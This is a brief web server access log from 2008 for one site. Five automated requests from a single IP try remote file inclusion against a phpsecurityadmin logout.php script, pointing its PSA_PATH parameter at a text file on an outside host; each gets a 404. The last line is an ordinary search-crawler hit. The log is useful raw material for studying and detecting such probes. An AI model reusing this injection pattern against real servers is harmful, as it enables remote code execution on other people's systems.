74.52.114.58 - - [08/Jun/2008:10:20:31 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:20:31 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:20:31 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:20:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:20:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.213.30 - - [08/Jun/2008:10:20:49 -0700] "GET /minamijewelry/html/wind.html HTTP/1.0" 200 20882 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
